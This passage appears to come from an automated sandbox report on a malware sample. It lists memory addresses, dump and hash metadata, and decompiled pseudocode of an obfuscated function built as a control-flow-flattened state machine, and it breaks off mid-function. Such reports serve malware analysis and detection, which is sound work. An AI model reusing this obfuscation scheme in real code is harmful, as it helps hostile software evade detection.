                                                                                                                                                                                      0x003da11a
                                                                                                                                                                                      0x003da122
                                                                                                                                                                                      0x003da12a
                                                                                                                                                                                      0x003da135
                                                                                                                                                                                      0x003da13d
                                                                                                                                                                                      0x003da148
                                                                                                                                                                                      0x003da153
                                                                                                                                                                                      0x003da15b
                                                                                                                                                                                      0x003da166
                                                                                                                                                                                      0x003da171
                                                                                                                                                                                      0x003da17c
                                                                                                                                                                                      0x003da187
                                                                                                                                                                                      0x003da192
                                                                                                                                                                                      0x003da19d
                                                                                                                                                                                      0x003da1a8
                                                                                                                                                                                      0x003da1b0
                                                                                                                                                                                      0x003da1bd
                                                                                                                                                                                      0x003da1c1
                                                                                                                                                                                      0x003da1c6
                                                                                                                                                                                      0x003da1ce
                                                                                                                                                                                      0x003da1d6
                                                                                                                                                                                      0x003da1e0
                                                                                                                                                                                      0x003da1e4
                                                                                                                                                                                      0x003da1ec
                                                                                                                                                                                      0x003da1f6
                                                                                                                                                                                      0x003da1fe
                                                                                                                                                                                      0x003da206
                                                                                                                                                                                      0x003da20e
                                                                                                                                                                                      0x003da216
                                                                                                                                                                                      0x003da21e
                                                                                                                                                                                      0x003da22e
                                                                                                                                                                                      0x003da234
                                                                                                                                                                                      0x003da23c
                                                                                                                                                                                      0x003da24e
                                                                                                                                                                                      0x003da253
                                                                                                                                                                                      0x003da25c
                                                                                                                                                                                      0x003da267
                                                                                                                                                                                      0x003da272
                                                                                                                                                                                      0x003da27d
                                                                                                                                                                                      0x003da288
                                                                                                                                                                                      0x003da293
                                                                                                                                                                                      0x003da29b
                                                                                                                                                                                      0x003da2a0
                                                                                                                                                                                      0x003da2a8
                                                                                                                                                                                      0x003da2b0
                                                                                                                                                                                      0x003da2b8
                                                                                                                                                                                      0x003da2c5
                                                                                                                                                                                      0x003da2c8
                                                                                                                                                                                      0x003da2cc
                                                                                                                                                                                      0x003da2d1
                                                                                                                                                                                      0x003da2d9
                                                                                                                                                                                      0x003da2e4
                                                                                                                                                                                      0x003da2ef
                                                                                                                                                                                      0x003da2fa
                                                                                                                                                                                      0x003da305
                                                                                                                                                                                      0x003da310
                                                                                                                                                                                      0x003da31b
                                                                                                                                                                                      0x003da326
                                                                                                                                                                                      0x003da331
                                                                                                                                                                                      0x003da33c
                                                                                                                                                                                      0x003da344
                                                                                                                                                                                      0x003da34c
                                                                                                                                                                                      0x003da35c
                                                                                                                                                                                      0x003da360
                                                                                                                                                                                      0x003da368
                                                                                                                                                                                      0x003da375
                                                                                                                                                                                      0x003da378
                                                                                                                                                                                      0x003da37c
                                                                                                                                                                                      0x003da38c
                                                                                                                                                                                      0x003da390
                                                                                                                                                                                      0x003da398
                                                                                                                                                                                      0x003da3a3
                                                                                                                                                                                      0x003da3ae
                                                                                                                                                                                      0x003da3b9
                                                                                                                                                                                      0x003da3c5
                                                                                                                                                                                      0x003da3c8
                                                                                                                                                                                      0x003da3cc
                                                                                                                                                                                      0x003da3d4
                                                                                                                                                                                      0x003da3dc
                                                                                                                                                                                      0x003da3e7
                                                                                                                                                                                      0x003da3f7
                                                                                                                                                                                      0x003da3fe
                                                                                                                                                                                      0x003da409
                                                                                                                                                                                      0x003da416
                                                                                                                                                                                      0x003da41e
                                                                                                                                                                                      0x003da429
                                                                                                                                                                                      0x003da434
                                                                                                                                                                                      0x003da43f
                                                                                                                                                                                      0x003da454
                                                                                                                                                                                      0x003da457
                                                                                                                                                                                      0x003da45e
                                                                                                                                                                                      0x003da469
                                                                                                                                                                                      0x003da474
                                                                                                                                                                                      0x003da47f
                                                                                                                                                                                      0x003da48a
                                                                                                                                                                                      0x003da492
                                                                                                                                                                                      0x003da4a2
                                                                                                                                                                                      0x003da4aa
                                                                                                                                                                                      0x003da4ad
                                                                                                                                                                                      0x003da4b1
                                                                                                                                                                                      0x003da4b9
                                                                                                                                                                                      0x003da4c1
                                                                                                                                                                                      0x003da4c9
                                                                                                                                                                                      0x003da4d1
                                                                                                                                                                                      0x003da4d8
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x003da4e8
                                                                                                                                                                                      0x003da4e8
                                                                                                                                                                                      0x003da4e8
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4f9
                                                                                                                                                                                      0x003da4f9
                                                                                                                                                                                      0x003da61f
                                                                                                                                                                                      0x003da625
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x003da4ff
                                                                                                                                                                                      0x003da501
                                                                                                                                                                                      0x003da5ef
                                                                                                                                                                                      0x003da5f4
                                                                                                                                                                                      0x003da5f7
                                                                                                                                                                                      0x003da5fb
                                                                                                                                                                                      0x003da602
                                                                                                                                                                                      0x003da607
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da507
                                                                                                                                                                                      0x003da50d
                                                                                                                                                                                      0x003da5a3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da513
                                                                                                                                                                                      0x003da519
                                                                                                                                                                                      0x003da8d5
                                                                                                                                                                                      0x003da51f
                                                                                                                                                                                      0x003da525
                                                                                                                                                                                      0x003da593
                                                                                                                                                                                      0x003da599
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x003da527
                                                                                                                                                                                      0x003da52d
                                                                                                                                                                                      0x003da8ba
                                                                                                                                                                                      0x003da8ba
                                                                                                                                                                                      0x003da8c0
                                                                                                                                                                                      0x003da8c2
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da8c2
                                                                                                                                                                                      0x003da533
                                                                                                                                                                                      0x003da533
                                                                                                                                                                                      0x003da53d
                                                                                                                                                                                      0x003da544
                                                                                                                                                                                      0x003da544
                                                                                                                                                                                      0x003da53f
                                                                                                                                                                                      0x003da53f
                                                                                                                                                                                      0x003da53f
                                                                                                                                                                                      0x003da566
                                                                                                                                                                                      0x003da56b
                                                                                                                                                                                      0x003da570
                                                                                                                                                                                      0x003da578
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x003da4e8
                                                                                                                                                                                      0x003da4e8
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4f3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da52d
                                                                                                                                                                                      0x003da525
                                                                                                                                                                                      0x003da519
                                                                                                                                                                                      0x003da50d
                                                                                                                                                                                      0x003da501
                                                                                                                                                                                      0x003da8de
                                                                                                                                                                                      0x003da8e7
                                                                                                                                                                                      0x003da62f
                                                                                                                                                                                      0x003da62f
                                                                                                                                                                                      0x003da631
                                                                                                                                                                                      0x003da718
                                                                                                                                                                                      0x003da71b
                                                                                                                                                                                      0x003da73c
                                                                                                                                                                                      0x003da71d
                                                                                                                                                                                      0x003da728
                                                                                                                                                                                      0x003da733
                                                                                                                                                                                      0x003da733
                                                                                                                                                                                      0x003da77f
                                                                                                                                                                                      0x003da783
                                                                                                                                                                                      0x003da783
                                                                                                                                                                                      0x003da785
                                                                                                                                                                                      0x003da787
                                                                                                                                                                                      0x003da787
                                                                                                                                                                                      0x003da7c1
                                                                                                                                                                                      0x003da7e0
                                                                                                                                                                                      0x003da7e5
                                                                                                                                                                                      0x003da7e8
                                                                                                                                                                                      0x003da7ea
                                                                                                                                                                                      0x003da8ab
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da7f0
                                                                                                                                                                                      0x003da80b
                                                                                                                                                                                      0x003da81f
                                                                                                                                                                                      0x003da824
                                                                                                                                                                                      0x003da827
                                                                                                                                                                                      0x003da829
                                                                                                                                                                                      0x003da856
                                                                                                                                                                                      0x003da870
                                                                                                                                                                                      0x003da870
                                                                                                                                                                                      0x003da870
                                                                                                                                                                                      0x003da899
                                                                                                                                                                                      0x003da89e
                                                                                                                                                                                      0x003da89e
                                                                                                                                                                                      0x003da8a1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da8a1
                                                                                                                                                                                      0x003da637
                                                                                                                                                                                      0x003da637
                                                                                                                                                                                      0x003da63d
                                                                                                                                                                                      0x003da6ff
                                                                                                                                                                                      0x003da701
                                                                                                                                                                                      0x003da708
                                                                                                                                                                                      0x003da709
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x003da643
                                                                                                                                                                                      0x003da643
                                                                                                                                                                                      0x003da649
                                                                                                                                                                                      0x003da6e7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da64f
                                                                                                                                                                                      0x003da64f
                                                                                                                                                                                      0x003da655
                                                                                                                                                                                      0x003da6d8
                                                                                                                                                                                      0x003da6df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4df
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da4e3
                                                                                                                                                                                      0x003da657
                                                                                                                                                                                      0x003da657
                                                                                                                                                                                      0x003da65d
                                                                                                                                                                                      0x003da663
                                                                                                                                                                                      0x003da681
                                                                                                                                                                                      0x003da68d
                                                                                                                                                                                      0x003da69b
                                                                                                                                                                                      0x003da6ad
                                                                                                                                                                                      0x003da6b2
                                                                                                                                                                                      0x003da6b7
                                                                                                                                                                                      0x003da8b0
                                                                                                                                                                                      0x003da8b0
                                                                                                                                                                                      0x003da8b5
                                                                                                                                                                                      0x003da8b5
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da65d
                                                                                                                                                                                      0x003da655
                                                                                                                                                                                      0x003da649
                                                                                                                                                                                      0x003da63d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x003da631
                                                                                                                                                                                      0x003da4ed
                                                                                                                                                                                      0x003da4e8

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648394572.00000000003D0000.00000040.00000010.sdmp, Offset: 003D0000, based on PE: true
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_3d0000_loaddll32.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: %1o$-e$1-l$10x$42c$?t$J-$Kx$Lj@$M&$ZtD$blZw$e4K$nIh$u!
                                                                                                                                                                                      • API String ID: 0-4213897193
                                                                                                                                                                                      • Opcode ID: 610d3b61aceaaa35c2298ab7f0c0e32be14e94dc4b4a9b7b29cd0f287467eedc
                                                                                                                                                                                      • Instruction ID: 9f61f71573ed06760359a3c783611cd969c21d0bb58322ad8bb8b8cd3f944e91
                                                                                                                                                                                      • Opcode Fuzzy Hash: 610d3b61aceaaa35c2298ab7f0c0e32be14e94dc4b4a9b7b29cd0f287467eedc
                                                                                                                                                                                      • Instruction Fuzzy Hash: BB7211725083818FD379CF25D54AA9BFBE2BBC4704F10891DE5D99A260D7B08949CF93
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 99%
                                                                                                                                                                                      			E003E3ABE() {
                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                      				char _v1040;
                                                                                                                                                                                      				char _v1560;
                                                                                                                                                                                      				signed int _v1564;
                                                                                                                                                                                      				signed int _v1568;
                                                                                                                                                                                      				signed int _v1572;
                                                                                                                                                                                      				signed int _v1576;
                                                                                                                                                                                      				signed int _v1580;
                                                                                                                                                                                      				signed int _v1584;
                                                                                                                                                                                      				signed int _v1588;
                                                                                                                                                                                      				signed int _v1592;
                                                                                                                                                                                      				signed int _v1596;
                                                                                                                                                                                      				signed int _v1600;
                                                                                                                                                                                      				signed int _v1604;
                                                                                                                                                                                      				signed int _v1608;
                                                                                                                                                                                      				signed int _v1612;
                                                                                                                                                                                      				signed int _v1616;
                                                                                                                                                                                      				signed int _v1620;
                                                                                                                                                                                      				signed int _v1624;
                                                                                                                                                                                      				signed int _v1628;
                                                                                                                                                                                      				signed int _v1632;
                                                                                                                                                                                      				signed int _v1636;
                                                                                                                                                                                      				signed int _v1640;
                                                                                                                                                                                      				signed int _v1644;
                                                                                                                                                                                      				signed int _v1648;
                                                                                                                                                                                      				signed int _v1652;
                                                                                                                                                                                      				signed int _v1656;
                                                                                                                                                                                      				signed int _v1660;
                                                                                                                                                                                      				signed int _v1664;
                                                                                                                                                                                      				signed int _v1668;
                                                                                                                                                                                      				unsigned int _v1672;
                                                                                                                                                                                      				signed int _v1676;
                                                                                                                                                                                      				signed int _v1680;
                                                                                                                                                                                      				signed int _v1684;
                                                                                                                                                                                      				signed int _v1688;
                                                                                                                                                                                      				signed int _v1692;
                                                                                                                                                                                      				signed int _v1696;
                                                                                                                                                                                      				signed int _v1700;
                                                                                                                                                                                      				signed int _v1704;
                                                                                                                                                                                      				signed int _v1708;
                                                                                                                                                                                      				signed int _v1712;
                                                                                                                                                                                      				signed int _v1716;
                                                                                                                                                                                      				signed int _v1720;
                                                                                                                                                                                      				void* _t366;
                                                                                                                                                                                      				signed int _t384;
                                                                                                                                                                                      				void* _t385;
                                                                                                                                                                                      				void* _t413;
                                                                                                                                                                                      				signed int _t422;
                                                                                                                                                                                      				intOrPtr* _t424;
                                                                                                                                                                                      				signed int _t425;
                                                                                                                                                                                      				signed int _t426;
                                                                                                                                                                                      				signed int _t427;
                                                                                                                                                                                      				signed int _t428;
                                                                                                                                                                                      				signed int _t429;
                                                                                                                                                                                      				signed int _t430;
                                                                                                                                                                                      				signed int _t431;
                                                                                                                                                                                      				signed int _t432;
                                                                                                                                                                                      				signed int _t434;
                                                                                                                                                                                      				signed int* _t435;
                                                                                                                                                                                      				void* _t437;
                                                                                                                                                                                      
                                                                                                                                                                                      				_t435 =  &_v1720;
                                                                                                                                                                                      				_v1620 = 0x668385;
                                                                                                                                                                                      				_v1620 = _v1620 | 0x1e385418;
                                                                                                                                                                                      				_t385 = 0x69e6be1;
                                                                                                                                                                                      				_v1620 = _v1620 ^ 0x1e7ed7b4;
                                                                                                                                                                                      				_v1592 = 0xbd90f9;
                                                                                                                                                                                      				_v1592 = _v1592 ^ 0xbe5a7d98;
                                                                                                                                                                                      				_v1592 = _v1592 ^ 0xbee8ed5e;
                                                                                                                                                                                      				_v1568 = 0x3d8172;
                                                                                                                                                                                      				_t425 = 0x44;
                                                                                                                                                                                      				_v1568 = _v1568 / _t425;
                                                                                                                                                                                      				_v1568 = _v1568 ^ 0x0000e78e;
                                                                                                                                                                                      				_v1704 = 0x33329f;
                                                                                                                                                                                      				_t426 = 0x78;
                                                                                                                                                                                      				_v1576 = _v1576 & 0x00000000;
                                                                                                                                                                                      				_v1704 = _v1704 * 0x7a;
                                                                                                                                                                                      				_v1704 = _v1704 + 0x19e1;
                                                                                                                                                                                      				_v1704 = _v1704 << 2;
                                                                                                                                                                                      				_v1704 = _v1704 ^ 0x6198e69e;
                                                                                                                                                                                      				_v1700 = 0x4f7879;
                                                                                                                                                                                      				_v1700 = _v1700 ^ 0x068068af;
                                                                                                                                                                                      				_v1700 = _v1700 + 0xffffce8e;
                                                                                                                                                                                      				_v1700 = _v1700 / _t426;
                                                                                                                                                                                      				_v1700 = _v1700 ^ 0x000e8620;
                                                                                                                                                                                      				_v1708 = 0x211c1a;
                                                                                                                                                                                      				_v1708 = _v1708 + 0xf4aa;
                                                                                                                                                                                      				_v1708 = _v1708 ^ 0x94e44756;
                                                                                                                                                                                      				_v1708 = _v1708 << 0x10;
                                                                                                                                                                                      				_v1708 = _v1708 ^ 0x57920010;
                                                                                                                                                                                      				_v1636 = 0x4bfd4e;
                                                                                                                                                                                      				_v1636 = _v1636 + 0xffffda49;
                                                                                                                                                                                      				_v1636 = _v1636 << 0xa;
                                                                                                                                                                                      				_v1636 = _v1636 ^ 0x2f5a0b3c;
                                                                                                                                                                                      				_v1676 = 0xfcfb0f;
                                                                                                                                                                                      				_v1676 = _v1676 << 7;
                                                                                                                                                                                      				_v1676 = _v1676 >> 1;
                                                                                                                                                                                      				_v1676 = _v1676 ^ 0x3f3be9f2;
                                                                                                                                                                                      				_v1716 = 0xe94f3a;
                                                                                                                                                                                      				_v1716 = _v1716 + 0x398d;
                                                                                                                                                                                      				_t427 = 0x21;
                                                                                                                                                                                      				_v1716 = _v1716 / _t427;
                                                                                                                                                                                      				_t428 = 0x3d;
                                                                                                                                                                                      				_v1716 = _v1716 / _t428;
                                                                                                                                                                                      				_v1716 = _v1716 ^ 0x000241fc;
                                                                                                                                                                                      				_v1648 = 0xf37a20;
                                                                                                                                                                                      				_v1648 = _v1648 >> 0xf;
                                                                                                                                                                                      				_v1648 = _v1648 + 0xffff36a3;
                                                                                                                                                                                      				_v1648 = _v1648 ^ 0xfff985b4;
                                                                                                                                                                                      				_v1612 = 0xeb47bb;
                                                                                                                                                                                      				_v1612 = _v1612 >> 0xc;
                                                                                                                                                                                      				_v1612 = _v1612 ^ 0x000d65c2;
                                                                                                                                                                                      				_v1628 = 0xe61d50;
                                                                                                                                                                                      				_v1628 = _v1628 ^ 0xa9fbeeec;
                                                                                                                                                                                      				_v1628 = _v1628 | 0xe3d14da7;
                                                                                                                                                                                      				_v1628 = _v1628 ^ 0xebd6d513;
                                                                                                                                                                                      				_v1564 = 0xf3754;
                                                                                                                                                                                      				_v1564 = _v1564 << 0xd;
                                                                                                                                                                                      				_v1564 = _v1564 ^ 0xe6e10fa0;
                                                                                                                                                                                      				_v1672 = 0xc5ca9d;
                                                                                                                                                                                      				_v1672 = _v1672 + 0xffff8821;
                                                                                                                                                                                      				_v1672 = _v1672 >> 4;
                                                                                                                                                                                      				_v1672 = _v1672 ^ 0x000d1be5;
                                                                                                                                                                                      				_v1680 = 0xd5cdff;
                                                                                                                                                                                      				_v1680 = _v1680 + 0xffff8c76;
                                                                                                                                                                                      				_v1680 = _v1680 ^ 0x1718c905;
                                                                                                                                                                                      				_v1680 = _v1680 ^ 0x17c13aa7;
                                                                                                                                                                                      				_v1652 = 0x8270d6;
                                                                                                                                                                                      				_v1652 = _v1652 ^ 0x5839d95c;
                                                                                                                                                                                      				_v1652 = _v1652 << 0xf;
                                                                                                                                                                                      				_v1652 = _v1652 ^ 0xd4c474fb;
                                                                                                                                                                                      				_v1600 = 0x30b015;
                                                                                                                                                                                      				_v1600 = _v1600 << 9;
                                                                                                                                                                                      				_v1600 = _v1600 ^ 0x616fae71;
                                                                                                                                                                                      				_v1608 = 0xfce334;
                                                                                                                                                                                      				_t429 = 0x72;
                                                                                                                                                                                      				_v1608 = _v1608 / _t429;
                                                                                                                                                                                      				_v1608 = _v1608 ^ 0x000060cb;
                                                                                                                                                                                      				_v1616 = 0x11d4d7;
                                                                                                                                                                                      				_v1616 = _v1616 ^ 0x5fd5780f;
                                                                                                                                                                                      				_v1616 = _v1616 ^ 0x5fc8e652;
                                                                                                                                                                                      				_v1684 = 0xeae186;
                                                                                                                                                                                      				_v1684 = _v1684 + 0x6cbc;
                                                                                                                                                                                      				_v1684 = _v1684 << 9;
                                                                                                                                                                                      				_v1684 = _v1684 ^ 0xd691ca6c;
                                                                                                                                                                                      				_v1656 = 0xc19984;
                                                                                                                                                                                      				_v1656 = _v1656 + 0xed45;
                                                                                                                                                                                      				_v1656 = _v1656 + 0xffffc771;
                                                                                                                                                                                      				_v1656 = _v1656 ^ 0x00ce1f0e;
                                                                                                                                                                                      				_v1664 = 0x536949;
                                                                                                                                                                                      				_v1664 = _v1664 + 0xecba;
                                                                                                                                                                                      				_v1664 = _v1664 + 0xffffade4;
                                                                                                                                                                                      				_v1664 = _v1664 ^ 0x005726c6;
                                                                                                                                                                                      				_v1632 = 0xfb25c3;
                                                                                                                                                                                      				_v1632 = _v1632 ^ 0x0d3ffa7d;
                                                                                                                                                                                      				_v1632 = _v1632 | 0x8d26d07e;
                                                                                                                                                                                      				_v1632 = _v1632 ^ 0x8deecb7d;
                                                                                                                                                                                      				_v1640 = 0x964dcf;
                                                                                                                                                                                      				_v1640 = _v1640 ^ 0x9308e53b;
                                                                                                                                                                                      				_v1640 = _v1640 << 5;
                                                                                                                                                                                      				_v1640 = _v1640 ^ 0x73df8b4b;
                                                                                                                                                                                      				_v1696 = 0x1c5cfe;
                                                                                                                                                                                      				_t430 = 0x58;
                                                                                                                                                                                      				_v1696 = _v1696 / _t430;
                                                                                                                                                                                      				_v1696 = _v1696 << 0xb;
                                                                                                                                                                                      				_v1696 = _v1696 + 0x4083;
                                                                                                                                                                                      				_v1696 = _v1696 ^ 0x029255c4;
                                                                                                                                                                                      				_v1596 = 0x844d79;
                                                                                                                                                                                      				_t431 = 0x13;
                                                                                                                                                                                      				_v1596 = _v1596 / _t431;
                                                                                                                                                                                      				_v1596 = _v1596 ^ 0x000fd2a5;
                                                                                                                                                                                      				_v1712 = 0xaa53e9;
                                                                                                                                                                                      				_v1712 = _v1712 + 0x3fa;
                                                                                                                                                                                      				_v1712 = _v1712 << 0xd;
                                                                                                                                                                                      				_v1712 = _v1712 << 6;
                                                                                                                                                                                      				_v1712 = _v1712 ^ 0xbf135427;
                                                                                                                                                                                      				_v1660 = 0xae69d;
                                                                                                                                                                                      				_v1660 = _v1660 << 2;
                                                                                                                                                                                      				_v1660 = _v1660 + 0x7495;
                                                                                                                                                                                      				_v1660 = _v1660 ^ 0x00217c42;
                                                                                                                                                                                      				_v1644 = 0xb4b8b2;
                                                                                                                                                                                      				_t432 = 0x6d;
                                                                                                                                                                                      				_v1644 = _v1644 / _t432;
                                                                                                                                                                                      				_v1644 = _v1644 + 0x9ca2;
                                                                                                                                                                                      				_v1644 = _v1644 ^ 0x000f71e9;
                                                                                                                                                                                      				_v1720 = 0xeb9827;
                                                                                                                                                                                      				_v1720 = _v1720 ^ 0x1e223217;
                                                                                                                                                                                      				_v1720 = _v1720 + 0x18fd;
                                                                                                                                                                                      				_v1720 = _v1720 >> 2;
                                                                                                                                                                                      				_v1720 = _v1720 ^ 0x07b980eb;
                                                                                                                                                                                      				_v1692 = 0x11b265;
                                                                                                                                                                                      				_v1692 = _v1692 + 0xb6a4;
                                                                                                                                                                                      				_v1692 = _v1692 | 0x79b4443a;
                                                                                                                                                                                      				_v1692 = _v1692 >> 5;
                                                                                                                                                                                      				_v1692 = _v1692 ^ 0x03c68786;
                                                                                                                                                                                      				_v1604 = 0x89a26d;
                                                                                                                                                                                      				_v1604 = _v1604 + 0xffffbcd3;
                                                                                                                                                                                      				_v1604 = _v1604 ^ 0x008010cd;
                                                                                                                                                                                      				_v1588 = 0x82ceb0;
                                                                                                                                                                                      				_v1588 = _v1588 ^ 0xda580ff4;
                                                                                                                                                                                      				_v1588 = _v1588 ^ 0xdad52801;
                                                                                                                                                                                      				_v1688 = 0x8fa58e;
                                                                                                                                                                                      				_v1688 = _v1688 + 0xffffbc44;
                                                                                                                                                                                      				_v1688 = _v1688 + 0xcff1;
                                                                                                                                                                                      				_v1688 = _v1688 >> 0xf;
                                                                                                                                                                                      				_v1688 = _v1688 ^ 0x0005e60c;
                                                                                                                                                                                      				_v1572 = 0x2eab26;
                                                                                                                                                                                      				_v1572 = _v1572 | 0x36542239;
                                                                                                                                                                                      				_v1572 = _v1572 ^ 0x36742fed;
                                                                                                                                                                                      				_v1668 = 0x40cdab;
                                                                                                                                                                                      				_v1668 = _v1668 | 0x2a03d9d8;
                                                                                                                                                                                      				_v1668 = _v1668 << 0x10;
                                                                                                                                                                                      				_v1668 = _v1668 ^ 0xddf50159;
                                                                                                                                                                                      				_t434 = _v1576;
                                                                                                                                                                                      				_t384 = _v1576;
                                                                                                                                                                                      				_t422 = _v1576;
                                                                                                                                                                                      				_v1580 = 0x2cbee;
                                                                                                                                                                                      				_v1580 = _v1580 << 6;
                                                                                                                                                                                      				_v1580 = _v1580 ^ 0x00b1d723;
                                                                                                                                                                                      				_v1584 = 0x5c5bfd;
                                                                                                                                                                                      				_v1584 = _v1584 >> 5;
                                                                                                                                                                                      				_v1584 = _v1584 ^ 0x000d5e5b;
                                                                                                                                                                                      				_v1624 = 0x4ce735;
                                                                                                                                                                                      				_v1624 = _v1624 << 0xf;
                                                                                                                                                                                      				_v1624 = _v1624 + 0xffff05be;
                                                                                                                                                                                      				_v1624 = _v1624 ^ 0x7393a0f1;
                                                                                                                                                                                      				while(1) {
                                                                                                                                                                                      					L1:
                                                                                                                                                                                      					_t413 = 0x5c;
                                                                                                                                                                                      					do {
                                                                                                                                                                                      						while(1) {
                                                                                                                                                                                      							L2:
                                                                                                                                                                                      							_t437 = _t385 - 0x94d2245;
                                                                                                                                                                                      							if(_t437 > 0) {
                                                                                                                                                                                      								break;
                                                                                                                                                                                      							}
                                                                                                                                                                                      							if(_t437 == 0) {
                                                                                                                                                                                      								_t424 =  *0x3f5bd8 + 0x30;
                                                                                                                                                                                      								while(1) {
                                                                                                                                                                                      									__eflags =  *_t424 - _t413;
                                                                                                                                                                                      									if( *_t424 == _t413) {
                                                                                                                                                                                      										break;
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t424 = _t424 + 2;
                                                                                                                                                                                      									__eflags = _t424;
                                                                                                                                                                                      								}
                                                                                                                                                                                      								_t422 = _t424 + 2;
                                                                                                                                                                                      								_t385 = 0x95c790a;
                                                                                                                                                                                      								continue;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								if(_t385 == 0x2370cca) {
                                                                                                                                                                                      									_t434 = E003EE606(_v1696, _t422, _t385, _v1704, _v1596, _v1712, _t385, _v1660, _v1644, _t385, _v1568, _t385, _v1720,  &_v520, _v1692, _v1708, _v1700, _t422, _t384, _t385, _v1604);
                                                                                                                                                                                      									_t435 =  &(_t435[0x13]);
                                                                                                                                                                                      									__eflags = _t434;
                                                                                                                                                                                      									if(_t434 == 0) {
                                                                                                                                                                                      										goto L10;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t385 = 0xd3e2153;
                                                                                                                                                                                      										_v1576 = 1;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											L1:
                                                                                                                                                                                      											_t413 = 0x5c;
                                                                                                                                                                                      											goto L2;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									if(_t385 == 0x3b57a48) {
                                                                                                                                                                                      										E003D7CC1(_t384, _v1584, _v1624);
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										if(_t385 == 0x5337573) {
                                                                                                                                                                                      											E003D7CC1(_t434, _v1668, _v1580);
                                                                                                                                                                                      											L10:
                                                                                                                                                                                      											_t385 = 0x3b57a48;
                                                                                                                                                                                      											while(1) {
                                                                                                                                                                                      												L1:
                                                                                                                                                                                      												_t413 = 0x5c;
                                                                                                                                                                                      												goto L2;
                                                                                                                                                                                      											}
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											if(_t385 != 0x69e6be1) {
                                                                                                                                                                                      												goto L25;
                                                                                                                                                                                      											} else {
                                                                                                                                                                                      												_push(_t385);
                                                                                                                                                                                      												E003DE259(_v1636, _v1620, _v1676, _v1716, _t385, _t385,  &_v1560, _v1648, _v1612);
                                                                                                                                                                                      												_t435 =  &(_t435[8]);
                                                                                                                                                                                      												_t385 = 0xa1bcbfc;
                                                                                                                                                                                      												while(1) {
                                                                                                                                                                                      													L1:
                                                                                                                                                                                      													_t413 = 0x5c;
                                                                                                                                                                                      													goto L2;
                                                                                                                                                                                      												}
                                                                                                                                                                                      											}
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L28:
                                                                                                                                                                                      							return _v1576;
                                                                                                                                                                                      						}
                                                                                                                                                                                      						__eflags = _t385 - 0x95c790a;
                                                                                                                                                                                      						if(_t385 == 0x95c790a) {
                                                                                                                                                                                      							_t384 = E003F3231(_v1632, _v1592, _v1640);
                                                                                                                                                                                      							_t435 =  &(_t435[3]);
                                                                                                                                                                                      							__eflags = _t384;
                                                                                                                                                                                      							if(_t384 == 0) {
                                                                                                                                                                                      								_t385 = 0xde41895;
                                                                                                                                                                                      								_t413 = 0x5c;
                                                                                                                                                                                      								goto L25;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								_t385 = 0x2370cca;
                                                                                                                                                                                      								goto L1;
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags = _t385 - 0xa1bcbfc;
                                                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                                                      								_push(0x3d144c);
                                                                                                                                                                                      								_t366 = E003F0AD3(_v1628, _v1564, __eflags);
